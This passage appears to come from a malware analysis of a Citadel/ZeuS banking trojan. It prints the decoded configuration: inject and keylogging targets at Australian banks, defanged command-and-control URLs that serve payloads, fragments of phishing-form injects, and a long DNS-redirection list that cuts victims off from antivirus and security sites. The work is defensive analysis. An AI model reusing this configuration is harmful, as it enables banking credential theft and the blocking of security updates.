[HTTP_INJECTS:target] h00ps://ibanking.stgeorge.com.au/InternetBanking/viewAccountPortfolio.do*
[HTTP_INJECTS:target] h00ps://internetbanking.suncorpbank.com.au*

{   "zeustargets": [{
            "id": 1,
            "target": "h00ps://*.westpac.com.au/esis/Login/SrvPage*"}, {
            "id": 2,
            "target": "h00ps://*.westpac.com.au/wtwt/startpage*"}, {
            "id": 3,
            "target": "h00ps://*internetbanking.suncorpbank.com.au*"}, {
            "id": 4,
            "target": "h00ps://banking*.anz.com/*"}, {
            "id": 5,
            "target": "h00ps://*.anz.com/IBAU/BANKAWAYTRAN*"}, {
            "id": 6,
            "target": "h00ps://*.anz.com/IBAU/BANKAWAYTRAN*"}, {
            "id": 7,
            "target": "h00ps://ibanking.stgeorge.com.au/InternetBanking/viewAccountPortfolio.do*"}, {
            "id": 8,
            "target": "h00ps://internetbanking.suncorpbank.com.au*"}, {
            "id": 9,
            "target": "h00ps://ib.nab.com.au/nabib/acctInfo_acctBal.ctl*"}, {
            "id": 10,
            "target": "*commbiz.commbank.com.au*"}, {
            "id": 11,
            "target": "*/my.ebay.com/*CurrentPage=MyeBayPersonalInfo*"}, {
            "id": 12,
            "target": "*.ebay.com/*eBayISAPI.dll?*"} ],

    "c2s": ["h00p://www.keihingroup.co.jp/libraries/joomla/access/file.php|file=4mar.exe", 
            "h00p://keximvlc.com.vn/administrator/modules/mod_menu/tmpl/content.php", 
            "h00p://oklodfmmm.com/pro/file.php", 
            "h00p://k-k131.co.jp/administrator/templates/system/html/file.php|file=conf.bin", 
            "h00p://www.keihingroup.co.jp/libraries/joomla/access/file.php|file=conf.bin", 
            "h00p://mobileindexstats.net/pro/file.php|file=conf.bin"
            ],
    "keylog": 
           ["#*wellsfargo.com/*", 
            "#*adelaidebank.com/*", 
            "#*anz.com/*", 
            "#*boq.com.au/*", 
            "#*banksa.com.au/*", 
            "#*bankwest.com.au/*", 
            "#*westpac.com.au/*", 
            "#*citibank.com.au/*", 
            "#*colonialfirststate.com.au/*", 
            "#*commbank.com.au/*", 
            "#*australia.db.com/*", 
            "#*ezypay.com.au/*", 
            "#*nab.com.au/*", 
            "#*suncorp.com.au/*", 
            "#*ibanking.stgeorge.com.au/*", 
            "#*ingdirect.com.au/*", 
            "#*mebank.com.au/*", 
            "#*bankers.asn.au/*", 
            "#*hsbc.com.au/*", 
            "#*macquarie.com.au/*", 
            "#*rba.gov.au/*", 
            "#*www.bankmecu.com.au/*", 
            "#*etrade.com.au/*", 
            "#*maitlandmutual.com/*", 
            "#*aussie.com.au/*", 
            "#*virginmoney.com.au/*", 
            "#*paydaymate.com.au/*", 
            "#*cashdoctors.com.au/*", 
            "#*cua.com.au/*", 
            "#*peopleschoicecu.com.au/*", 
            "#*cufa.com.au/*", 
            "#*cbh.com.au/*", 
            "#*hbf.com.au/*", 
            "#*australianunity.com.au/*", 
            "#*racv.com.au/*", 
            "#*namoicotton.com.au/*", 
            "#*australianunityinvestments.com.au/*", 
            "#*dfmc.org.au/*", 

            "bank.exe;java.exe", 
            "*facebook.com/*"],
    "screenshot": ["@*payment.com/*"] }

OK. So what had been injected? The code of phishing forms like we used to see in Cridex/Fareit PWS kind of format was used to be injected upon the targeted sites, see the partial decoded TRAFFIC downloaded as per snipped codes below:

The online banking account's credential phishing traces..

[...]
"label": "current password",
"brand": 1,
"type": "pwd"
}],
Primary Email Address:
[...]

[...]
＜id="IBSum_accountName "＞
＜B＞Pending Payments＜/B＞ ＜FORM formButton=...size:90＞ 
＜a href="h00p://w.suncCpb4k[..]m.au/[..]/personal/i
   [..]// + other URLs are all mentioned above..
＜td class="actionHeaderTopPadding" ＞Balances and Transactions("
＜!--This is required for bway:button＞
＜a href='h00p://www.anz.com/internet-banking/help/glossary/#available_funds'＞

＜td class="impInfoHeader"＞Important Information＜/td＞
Your daily Pay Anyone limit＜br＞
[..]headers="Account Name"＞
＜h2＞Payments that I have scheduled＜/h2＞
click for transaction history
＜A title="Sort by Account"＞
   [..]// + other URLs are all mentioned above..

What else? AntiVirus product's updates URL Redirector

Citadel has the function to redirect the DNS request of the certain sites to be redirected into a certain IP, in the main configuration this function is often spotted to be used to redirect the antivirus upates/download urls into the Citadel's pointed sites.

In our case we found this function is used to redirect the huge list of AV products updates to the IP address: 209.85.229.104 (Google), let's see the following codes:

[DNS_REDIRECTION:data] *antivirus*=209.85.229.104
[DNS_REDIRECTION:data] bitdefender.com=209.85.229.104
[DNS_REDIRECTION:data] download.bitdefender.com=209.85.229.104
[DNS_REDIRECTION:data] update.bitdefender.com=209.85.229.104
[DNS_REDIRECTION:data] wfbs51-p.activeupdate.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] wfbs60-p.activeupdate.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] iau.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] licenseupdate.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] csm-as.activeupdate.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] wfbs6-icss-p.activeupdate.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] oc.activeupdate.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] update.avg.com=209.85.229.104
[DNS_REDIRECTION:data] update.grisoft.com=209.85.229.104
[DNS_REDIRECTION:data] backup.avg.cz=209.85.229.104
[DNS_REDIRECTION:data] backup.grisoft.cz=209.85.229.104
[DNS_REDIRECTION:data] files2.grisoft.cz=209.85.229.104
[DNS_REDIRECTION:data] files2.avg.cz=209.85.229.104
[DNS_REDIRECTION:data] download.grisoft.cz=209.85.229.104
[DNS_REDIRECTION:data] download.avg.cz=209.85.229.104
[DNS_REDIRECTION:data] akamai.grisoft.cz=209.85.229.104
[DNS_REDIRECTION:data] akamai.grisoft.cz.edgesuite.net=209.85.229.104
[DNS_REDIRECTION:data] akamai.avg.cz=209.85.229.104
[DNS_REDIRECTION:data] akamai.avg.cz.edgesuite.net=209.85.229.104
[DNS_REDIRECTION:data] akamai.grisoft.com=209.85.229.104
[DNS_REDIRECTION:data] akamai.avg.com=209.85.229.104
[DNS_REDIRECTION:data] akamai.grisoft.com.edgesuite.net=209.85.229.104
[DNS_REDIRECTION:data] akamai.avg.com.edgesuite.net=209.85.229.104
[DNS_REDIRECTION:data] data-cdn.mbamupdates.com=209.85.229.104
[DNS_REDIRECTION:data] su.pctools.com=209.85.229.104
[DNS_REDIRECTION:data] pctools.com=209.85.229.104
[DNS_REDIRECTION:data] download.lavasoft.com=209.85.229.104
[DNS_REDIRECTION:data] secure.lavasoft.com=209.85.229.104
[DNS_REDIRECTION:data] lavasoft.com=209.85.229.104
[DNS_REDIRECTION:data] bitdefender.nl=209.85.229.104
[DNS_REDIRECTION:data] virustotal.com=209.85.229.104
[DNS_REDIRECTION:data] trendmicro.nl=209.85.229.104
[DNS_REDIRECTION:data] trendmicro.com.au=209.85.229.104
[DNS_REDIRECTION:data] www.trendmicro.com.au=209.85.229.104
[DNS_REDIRECTION:data] securesoft.com.au=209.85.229.104
[DNS_REDIRECTION:data] avira.com.au=209.85.229.104
[DNS_REDIRECTION:data] gratissoftwaresite.nl=209.85.229.104
[DNS_REDIRECTION:data] nod32.com.au=209.85.229.104
[DNS_REDIRECTION:data] pandasecurity.com.au=209.85.229.104
[DNS_REDIRECTION:data] lavasoft.com.au=209.85.229.104
[DNS_REDIRECTION:data] avg.com.au=209.85.229.104
[DNS_REDIRECTION:data] symantec-norton.com=209.85.229.104
[DNS_REDIRECTION:data] housecall.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] forums.malwarebytes.org=209.85.229.104
[DNS_REDIRECTION:data] malwarebytes.org=209.85.229.104
[DNS_REDIRECTION:data] pchelpforum.com=209.85.229.104
[DNS_REDIRECTION:data] pchelpforum.com=209.85.229.104
[DNS_REDIRECTION:data] forums.cnet.com=209.85.229.104
[DNS_REDIRECTION:data] techsupportforum.com=209.85.229.104
[DNS_REDIRECTION:data] gratissoftware.nu=209.85.229.104
[DNS_REDIRECTION:data] majorgeeks.com=209.85.229.104
[DNS_REDIRECTION:data] forums.pcworld.com=209.85.229.104
[DNS_REDIRECTION:data] antivirus.microbe.com.au=209.85.229.104
[DNS_REDIRECTION:data] avast.com.au=209.85.229.104
[DNS_REDIRECTION:data] avg-antivirus.com.au=209.85.229.104
[DNS_REDIRECTION:data] nortonantiviruscenter.com=209.85.229.104
[DNS_REDIRECTION:data] threatmetrix.com=209.85.229.104
[DNS_REDIRECTION:data] www.zonealarm.com=209.85.229.104
[DNS_REDIRECTION:data] firewallguide.com=209.85.229.104
[DNS_REDIRECTION:data] auditmypc.com=209.85.229.104
[DNS_REDIRECTION:data] comodo.com=209.85.229.104
[DNS_REDIRECTION:data] free-firewall.org=209.85.229.104
[DNS_REDIRECTION:data] schoonepc.nl=209.85.229.104
[DNS_REDIRECTION:data] iopus.com=209.85.229.104
[DNS_REDIRECTION:data] tucows.com=209.85.229.104
[DNS_REDIRECTION:data] avg-antivirus-plus-firewall.en.softonic.com=209.85.229.104
[DNS_REDIRECTION:data] superantispyware.com.au=209.85.229.104
[DNS_REDIRECTION:data] superantispyware.com=209.85.229.104
[DNS_REDIRECTION:data] harveynorman.com.au=209.85.229.104
[DNS_REDIRECTION:data] ca-store.com.au=209.85.229.104
[DNS_REDIRECTION:data] netfreighters.com.au=209.85.229.104
[DNS_REDIRECTION:data] securetec.com.au=209.85.229.104
[DNS_REDIRECTION:data] anti-spyware.com.au=209.85.229.104
[DNS_REDIRECTION:data] virusscan.jotti.org=209.85.229.104
[DNS_REDIRECTION:data] virscan.org=209.85.229.104
[DNS_REDIRECTION:data] antivir.ru=209.85.229.104
[DNS_REDIRECTION:data] analysis.avira.com=209.85.229.104
[DNS_REDIRECTION:data] hijackthis.de=209.85.229.104
[DNS_REDIRECTION:data] uploadmalware.com=209.85.229.104
[DNS_REDIRECTION:data] emsisoft.com=209.85.229.104
[DNS_REDIRECTION:data] kaspersky.co.uk=209.85.229.104
[DNS_REDIRECTION:data] bitdefender.co.uk=209.85.229.104
[DNS_REDIRECTION:data] eset.co.uk=209.85.229.104
[DNS_REDIRECTION:data] webroot.com=209.85.229.104
[DNS_REDIRECTION:data] gdatasoftware.co.uk=209.85.229.104
[DNS_REDIRECTION:data] pcpro.co.uk=209.85.229.104
[DNS_REDIRECTION:data] webroot.co.uk=209.85.229.104
[DNS_REDIRECTION:data] cyprotect.com=209.85.229.104
[DNS_REDIRECTION:data] cloudantivirus.com=209.85.229.104
[DNS_REDIRECTION:data] drweb-antivir.it=209.85.229.104
[DNS_REDIRECTION:data] escanav.com=209.85.229.104
[DNS_REDIRECTION:data] clamwin.com=209.85.229.104
[DNS_REDIRECTION:data] nod32.nl=209.85.229.104
[DNS_REDIRECTION:data] webroot.nl=209.85.229.104
[DNS_REDIRECTION:data] av.eu=209.85.229.104
[DNS_REDIRECTION:data] vergelijk.nl=209.85.229.104
[DNS_REDIRECTION:data] antivirusvergelijk.nl=209.85.229.104
[DNS_REDIRECTION:data] virussen.upc.nl=209.85.229.104
[DNS_REDIRECTION:data] antivirus.startpagina.nl=209.85.229.104
[DNS_REDIRECTION:data] avastav.nl=209.85.229.104
[DNS_REDIRECTION:data] defenx.nl=209.85.229.104
[DNS_REDIRECTION:data] gdata.nl=209.85.229.104
[DNS_REDIRECTION:data] bitdefender.nl=209.85.229.104
[DNS_REDIRECTION:data] removevirus.org=209.85.229.104
[DNS_REDIRECTION:data] windows.microsoft.com=209.85.229.104
[DNS_REDIRECTION:data] answers.microsoft.com=209.85.229.104
[DNS_REDIRECTION:data] myantispyware.com=209.85.229.104
[DNS_REDIRECTION:data] krebsonsecurity.com=209.85.229.104
[DNS_REDIRECTION:data] antivirus.about.com=209.85.229.104
[DNS_REDIRECTION:data] cleanuninstall.com=209.85.229.104
[DNS_REDIRECTION:data] staples.com=209.85.229.104
[DNS_REDIRECTION:data] esetindia.com=209.85.229.104
[DNS_REDIRECTION:data] mcafee.free-trials.net=209.85.229.104
[DNS_REDIRECTION:data] antivir-2012.com=209.85.229.104
[DNS_REDIRECTION:data] panda-antivirus.en.softonic.com=209.85.229.104
[DNS_REDIRECTION:data] softonic.com=209.85.229.104
[DNS_REDIRECTION:data] freeantivirushelp.com=209.85.229.104
[DNS_REDIRECTION:data] scanwith.com=209.85.229.104
[DNS_REDIRECTION:data] bestantivirusreviewed.com=209.85.229.104
[DNS_REDIRECTION:data] virus-help.net=209.85.229.104
[DNS_REDIRECTION:data] cleanallspyware.com=209.85.229.104
[DNS_REDIRECTION:data] kingsoftsecurity.com=209.85.229.104
[DNS_REDIRECTION:data] threatfire.com=209.85.229.104
[DNS_REDIRECTION:data] freeavg.com=209.85.229.104
[DNS_REDIRECTION:data] clamav.net=209.85.229.104
[DNS_REDIRECTION:data] pcthreat.com=209.85.229.104
[DNS_REDIRECTION:data] 2-viruses.com=209.85.229.104
[DNS_REDIRECTION:data] trojan-killer.ne=209.85.229.104
[DNS_REDIRECTION:data] virusinfo.info=209.85.229.104
[DNS_REDIRECTION:data] www.virusinfo.info=209.85.229.104
[DNS_REDIRECTION:data] projecthoneypot.org=209.85.229.104
[DNS_REDIRECTION:data] www.projecthoneypot.org=209.85.229.104
[DNS_REDIRECTION:data] novirus.ru=209.85.229.104
[DNS_REDIRECTION:data] www.novirus.ru=209.85.229.104
[DNS_REDIRECTION:data] anti-malware.com=209.85.229.104
[DNS_REDIRECTION:data] www.anti-malware.com=209.85.229.104
[DNS_REDIRECTION:data] offensivecomputing.net=209.85.229.104
[DNS_REDIRECTION:data] www.offensivecomputing.n=209.85.229.104et
[DNS_REDIRECTION:data] zeustracker.abuse.ch=209.85.229.104
[DNS_REDIRECTION:data] www.zeustracker.abuse.ch=209.85.229.104
[DNS_REDIRECTION:data] www.malekal.com=209.85.229.104
[DNS_REDIRECTION:data] www3.malekal.com=209.85.229.104
[DNS_REDIRECTION:data] forum.malekal.com=209.85.229.104
[DNS_REDIRECTION:data] www.threatexpert.com=209.85.229.104
[DNS_REDIRECTION:data] threatexpert.com=209.85.229.104
[DNS_REDIRECTION:data] www.microsoft.com=209.85.229.104
[DNS_REDIRECTION:data] update.microsoft.com=209.85.229.104
[DNS_REDIRECTION:data] www.virustotal.com=209.85.229.104
[DNS_REDIRECTION:data] virusscan.jotti.org=209.85.229.104
[DNS_REDIRECTION:data] www.av-comparatives.org=209.85.229.104
[DNS_REDIRECTION:data] av-comparatives.org=209.85.229.104
[DNS_REDIRECTION:data] av-test.org=209.85.229.104
[DNS_REDIRECTION:data] www.av-test.org=209.85.229.104
[DNS_REDIRECTION:data] www.scanwith.com=209.85.229.104
[DNS_REDIRECTION:data] trendmicro.com.au=209.85.229.104
[DNS_REDIRECTION:data] kasperskyanz.com.au=209.85.229.104
[DNS_REDIRECTION:data] bitdefender.com.au=209.85.229.104
[DNS_REDIRECTION:data] eset.com.au=209.85.229.104
[DNS_REDIRECTION:data] vet.com.au=209.85.229.104
[DNS_REDIRECTION:data] sm.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] home.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] toolbar.avg.com=209.85.229.104
[DNS_REDIRECTION:data] stats.avg.com=209.85.229.104
[DNS_REDIRECTION:data] www.virusbtn.com=209.85.229.104
[DNS_REDIRECTION:data] adwarereport.com=209.85.229.104
[DNS_REDIRECTION:data] avg.com.au=209.85.229.104
[DNS_REDIRECTION:data] www.adwarereport.com=209.85.229.104
[DNS_REDIRECTION:data] malwarebytes.org=209.85.229.104
[DNS_REDIRECTION:data] www.malwarebytes.org=209.85.229.104
[DNS_REDIRECTION:data] dw.com.com=209.85.229.104
[DNS_REDIRECTION:data] nss-shasta-rrs.symantec.com=209.85.229.104
[DNS_REDIRECTION:data] spywarewarrior.com=209.85.229.104
[DNS_REDIRECTION:data] www.spywarewarrior.com=209.85.229.104
[DNS_REDIRECTION:data] avsoft.ru=209.85.229.104
[DNS_REDIRECTION:data] www.avsoft.ru=209.85.229.104
[DNS_REDIRECTION:data] onecare.live.com=209.85.229.104
[DNS_REDIRECTION:data] anubis.iseclab.org=209.85.229.104
[DNS_REDIRECTION:data] wepawet.iseclab.org=209.85.229.104
[DNS_REDIRECTION:data] iseclab.org=209.85.229.104
[DNS_REDIRECTION:data] www.iseclab.org=209.85.229.104
[DNS_REDIRECTION:data] www.freespaceinternetsec=209.85.229.104urity.com
[DNS_REDIRECTION:data] freespaceinternetsecurit=209.85.229.104y.com
[DNS_REDIRECTION:data] sunbelt-software.com=209.85.229.104
[DNS_REDIRECTION:data] www.sunbelt-software.com=209.85.229.104
[DNS_REDIRECTION:data] www.prevx.com=209.85.229.104
[DNS_REDIRECTION:data] prevx.com=209.85.229.104
[DNS_REDIRECTION:data] analysis.seclab.tuwien.a=209.85.229.104c.at
[DNS_REDIRECTION:data] www.joebox.org=209.85.229.104
[DNS_REDIRECTION:data] joebox.org=209.85.229.104
[DNS_REDIRECTION:data] gmer.net=209.85.229.104
[DNS_REDIRECTION:data] www.gmer.net=209.85.229.104
[DNS_REDIRECTION:data] antirootkit.com=209.85.229.104
[DNS_REDIRECTION:data] www.antirootkit.com=209.85.229.104
[DNS_REDIRECTION:data] sectools.org=209.85.229.104
[DNS_REDIRECTION:data] www.sandboxie.com=209.85.229.104
[DNS_REDIRECTION:data] sandboxie.com=209.85.229.104
[DNS_REDIRECTION:data] nepenthes.mwcollect.org=209.85.229.104
[DNS_REDIRECTION:data] mwcollect.org=209.85.229.104
[DNS_REDIRECTION:data] www.amtso.org=209.85.229.104
[DNS_REDIRECTION:data] amtso.org=209.85.229.104
[DNS_REDIRECTION:data] www.nsslabs.com=209.85.229.104
[DNS_REDIRECTION:data] nsslabs.com=209.85.229.104
[DNS_REDIRECTION:data] www.icsalabs.com=209.85.229.104
[DNS_REDIRECTION:data] icsalabs.com=209.85.229.104
[DNS_REDIRECTION:data] www.checkvir.com=209.85.229.104
[DNS_REDIRECTION:data] checkvir.com=209.85.229.104
[DNS_REDIRECTION:data] www.check-mark.com=209.85.229.104
[DNS_REDIRECTION:data] check-mark.com=209.85.229.104
[DNS_REDIRECTION:data] www.protectstar-testlab.=209.85.229.104org
[DNS_REDIRECTION:data] protectstar-testlab.org=209.85.229.104
[DNS_REDIRECTION:data] www.anti-malware-test.co=209.85.229.104m
[DNS_REDIRECTION:data] anti-malware-test.com=209.85.229.104
[DNS_REDIRECTION:data] av-test.de=209.85.229.104
[DNS_REDIRECTION:data] www.av-test.de=209.85.229.104
[DNS_REDIRECTION:data] www.wildlist.org=209.85.229.104
[DNS_REDIRECTION:data] wildlist.org=209.85.229.104
[DNS_REDIRECTION:data] www.aavar.org=209.85.229.104
[DNS_REDIRECTION:data] aavar.org=209.85.229.104
[DNS_REDIRECTION:data] centralops.net=209.85.229.104
[DNS_REDIRECTION:data] www.staysafeonline.info=209.85.229.104
[DNS_REDIRECTION:data] staysafeonline.info=209.85.229.104
[DNS_REDIRECTION:data] www.rokop-security.de=209.85.229.104
[DNS_REDIRECTION:data] rokop-security.de=209.85.229.104
[DNS_REDIRECTION:data] www.wilderssecurity.com=209.85.229.104
[DNS_REDIRECTION:data] wilderssecurity.com=209.85.229.104
[DNS_REDIRECTION:data] www.superantispyware.com=209.85.229.104
[DNS_REDIRECTION:data] superantispyware.com=209.85.229.104
[DNS_REDIRECTION:data] update.microsoft.com=209.85.229.104
[DNS_REDIRECTION:data] www.kaspersky.com=209.85.229.104
[DNS_REDIRECTION:data] www.kaspersky.ru=209.85.229.104
[DNS_REDIRECTION:data] kaspersky.ru=209.85.229.104
[DNS_REDIRECTION:data] www.avp.ru=209.85.229.104
[DNS_REDIRECTION:data] avp.ru=209.85.229.104
[DNS_REDIRECTION:data] www.viruslist.com=209.85.229.104
[DNS_REDIRECTION:data] viruslist.com=209.85.229.104
[DNS_REDIRECTION:data] www.viruslist.ru=209.85.229.104
[DNS_REDIRECTION:data] www.kaspersky-antivirus.ru=209.85.229.104
[DNS_REDIRECTION:data] kaspersky-antivirus.ru=209.85.229.104
[DNS_REDIRECTION:data] downloads1.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] downloads2.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] downloads3.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] downloads4.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] downloads5.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] downloads-us1.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] downloads-us2.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] downloads-us3.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] downloads-eu1.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] downloads-eu2.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] kavdumps.kaspersky.com=209.85.229.104
[DNS_REDIRECTION:data] www.kasperskyclub.com=209.85.229.104
[DNS_REDIRECTION:data] forum.kasperskyclub.com=209.85.229.104
[DNS_REDIRECTION:data] forum.kasperskyclub.ru=209.85.229.104
[DNS_REDIRECTION:data] kasperskyclub.ru=209.85.229.104
[DNS_REDIRECTION:data] kasperskyclub.com=209.85.229.104
[DNS_REDIRECTION:data] ftp.kasperskylab.ru=209.85.229.104
[DNS_REDIRECTION:data] ftp.kaspersky.ru=209.85.229.104
[DNS_REDIRECTION:data] ftp.kaspersky-labs.com=209.85.229.104
[DNS_REDIRECTION:data] data.kaspersky.ru=209.85.229.104
[DNS_REDIRECTION:data] z-oleg.com=209.85.229.104
[DNS_REDIRECTION:data] www.z-oleg.com=209.85.229.104
[DNS_REDIRECTION:data] drweb.com=209.85.229.104
[DNS_REDIRECTION:data] www.drweb.com=209.85.229.104
[DNS_REDIRECTION:data] freedrweb.com=209.85.229.104
[DNS_REDIRECTION:data] www.freedrweb.com=209.85.229.104
[DNS_REDIRECTION:data] drweb.com.ua=209.85.229.104
[DNS_REDIRECTION:data] www.drweb.com.ua=209.85.229.104
[DNS_REDIRECTION:data] drweb.ru=209.85.229.104
[DNS_REDIRECTION:data] www.drweb.ru=209.85.229.104
[DNS_REDIRECTION:data] av-desk.com=209.85.229.104
[DNS_REDIRECTION:data] www.av-desk.com=209.85.229.104
[DNS_REDIRECTION:data] drweb.net=209.85.229.104
[DNS_REDIRECTION:data] www.drweb.net=209.85.229.104
[DNS_REDIRECTION:data] ftp.drweb.com=209.85.229.104
[DNS_REDIRECTION:data] dr-web.ru=209.85.229.104
[DNS_REDIRECTION:data] www.dr-web.ru=209.85.229.104
[DNS_REDIRECTION:data] download.drweb.com=209.85.229.104
[DNS_REDIRECTION:data] support.drweb.com=209.85.229.104
[DNS_REDIRECTION:data] updates.sald.com=209.85.229.104
[DNS_REDIRECTION:data] sald.com=209.85.229.104
[DNS_REDIRECTION:data] www.sald.com=209.85.229.104
[DNS_REDIRECTION:data] drweb.imshop.de=209.85.229.104
[DNS_REDIRECTION:data] safeweb.norton.com=209.85.229.104
[DNS_REDIRECTION:data] www.safeweb.norton.com=209.85.229.104
[DNS_REDIRECTION:data] www.symantec.com=209.85.229.104
[DNS_REDIRECTION:data] shop.symantecstore.com=209.85.229.104
[DNS_REDIRECTION:data] liveupdate.symantec.com=209.85.229.104
[DNS_REDIRECTION:data] liveupdate.symantecliveu=209.85.229.104pdate.com
[DNS_REDIRECTION:data] service1.symantec.com=209.85.229.104
[DNS_REDIRECTION:data] www.service1.symantec.co=209.85.229.104m
[DNS_REDIRECTION:data] security.symantec.com=209.85.229.104
[DNS_REDIRECTION:data] liveupdate.symantec.d4p.=209.85.229.104net
[DNS_REDIRECTION:data] securityresponse.symante=209.85.229.104c.com
[DNS_REDIRECTION:data] sygate.com=209.85.229.104
[DNS_REDIRECTION:data] www.sygate.com=209.85.229.104
[DNS_REDIRECTION:data] esetnod32.ru=209.85.229.104
[DNS_REDIRECTION:data] www.esetnod32.ru=209.85.229.104
[DNS_REDIRECTION:data] eset.com=209.85.229.104
[DNS_REDIRECTION:data] www.eset.com=209.85.229.104
[DNS_REDIRECTION:data] eset.com.ua=209.85.229.104
[DNS_REDIRECTION:data] www.eset.com.ua=209.85.229.104
[DNS_REDIRECTION:data] nod32.com.ua=209.85.229.104
[DNS_REDIRECTION:data] www.nod32.com.ua=209.85.229.104
[DNS_REDIRECTION:data] download.eset.com=209.85.229.104
[DNS_REDIRECTION:data] update.eset.com=209.85.229.104
[DNS_REDIRECTION:data] eset.eu=209.85.229.104
[DNS_REDIRECTION:data] www.eset.eu=209.85.229.104
[DNS_REDIRECTION:data] nod32.it=209.85.229.104
[DNS_REDIRECTION:data] www.nod32.it=209.85.229.104
[DNS_REDIRECTION:data] nod32.su=209.85.229.104
[DNS_REDIRECTION:data] www.nod32.su=209.85.229.104
[DNS_REDIRECTION:data] nod-32.ru=209.85.229.104
[DNS_REDIRECTION:data] www.nod-32.ru=209.85.229.104
[DNS_REDIRECTION:data] allnod.com=209.85.229.104
[DNS_REDIRECTION:data] www.allnod.com=209.85.229.104
[DNS_REDIRECTION:data] allnod.info=209.85.229.104
[DNS_REDIRECTION:data] www.allnod.info=209.85.229.104
[DNS_REDIRECTION:data] virusall.ru=209.85.229.104
[DNS_REDIRECTION:data] www.virusall.ru=209.85.229.104
[DNS_REDIRECTION:data] nod32eset.org=209.85.229.104
[DNS_REDIRECTION:data] www.nod32eset.org=209.85.229.104
[DNS_REDIRECTION:data] eset.sk=209.85.229.104
[DNS_REDIRECTION:data] www.eset.sk=209.85.229.104
[DNS_REDIRECTION:data] nod32.nl=209.85.229.104
[DNS_REDIRECTION:data] www.nod32.nl=209.85.229.104
[DNS_REDIRECTION:data] dl1.antivir.de=209.85.229.104
[DNS_REDIRECTION:data] dl2.antivir.de=209.85.229.104
[DNS_REDIRECTION:data] dl3.antivir.de=209.85.229.104
[DNS_REDIRECTION:data] dl4.antivir.de=209.85.229.104
[DNS_REDIRECTION:data] free-av.com=209.85.229.104
[DNS_REDIRECTION:data] www.free-av.com=209.85.229.104
[DNS_REDIRECTION:data] free-av.de=209.85.229.104
[DNS_REDIRECTION:data] www.free-av.de=209.85.229.104
[DNS_REDIRECTION:data] avira.com=209.85.229.104
[DNS_REDIRECTION:data] www.avira.com=209.85.229.104
[DNS_REDIRECTION:data] avira.de=209.85.229.104
[DNS_REDIRECTION:data] www.avira.de=209.85.229.104
[DNS_REDIRECTION:data] www1.avira.com=209.85.229.104
[DNS_REDIRECTION:data] dlpro.antivir.com=209.85.229.104
[DNS_REDIRECTION:data] forum.avira.com=209.85.229.104
[DNS_REDIRECTION:data] www.forum.avira.com=209.85.229.104
[DNS_REDIRECTION:data] avirus.ru=209.85.229.104
[DNS_REDIRECTION:data] www.avirus.ru=209.85.229.104
[DNS_REDIRECTION:data] avira-antivir.ru=209.85.229.104
[DNS_REDIRECTION:data] www.avira-antivir.ru=209.85.229.104
[DNS_REDIRECTION:data] avirus.com.ua=209.85.229.104
[DNS_REDIRECTION:data] www.avirus.com.ua=209.85.229.104
[DNS_REDIRECTION:data] mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] www.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] home.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] us.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] ru.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] de.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] ca.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] fr.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] au.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] es.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] it.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] uk.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] mx.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] ru.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] mcafee-online.com=209.85.229.104
[DNS_REDIRECTION:data] www.mcafee-online.com=209.85.229.104
[DNS_REDIRECTION:data] mcafeesecurity.com=209.85.229.104
[DNS_REDIRECTION:data] www.mcafeesecurity.com=209.85.229.104
[DNS_REDIRECTION:data] mcafeesecure.com=209.85.229.104
[DNS_REDIRECTION:data] www.mcafeesecure.com=209.85.229.104
[DNS_REDIRECTION:data] avertlabs.com=209.85.229.104
[DNS_REDIRECTION:data] www.avertlabs.com=209.85.229.104
[DNS_REDIRECTION:data] download.nai.com=209.85.229.104
[DNS_REDIRECTION:data] nai.com=209.85.229.104
[DNS_REDIRECTION:data] www.nai.com=209.85.229.104
[DNS_REDIRECTION:data] secure.nai.com=209.85.229.104
[DNS_REDIRECTION:data] eu.shopmcafee.com=209.85.229.104
[DNS_REDIRECTION:data] shop.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] siblog.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] mcafeestore.com=209.85.229.104
[DNS_REDIRECTION:data] www.mcafeestore.com=209.85.229.104
[DNS_REDIRECTION:data] service.mcafee.com=209.85.229.104
[DNS_REDIRECTION:data] siteadvisor.com=209.85.229.104
[DNS_REDIRECTION:data] www.siteadvisor.com=209.85.229.104
[DNS_REDIRECTION:data] scanalert.com=209.85.229.104
[DNS_REDIRECTION:data] www.drsolomon.com=209.85.229.104
[DNS_REDIRECTION:data] mcafee-at-home.com=209.85.229.104
[DNS_REDIRECTION:data] wwww.mcafee-at-home.com=209.85.229.104
[DNS_REDIRECTION:data] networkassociates.com=209.85.229.104
[DNS_REDIRECTION:data] www.networkassociates.com=209.85.229.104
[DNS_REDIRECTION:data] avast.ru=209.85.229.104
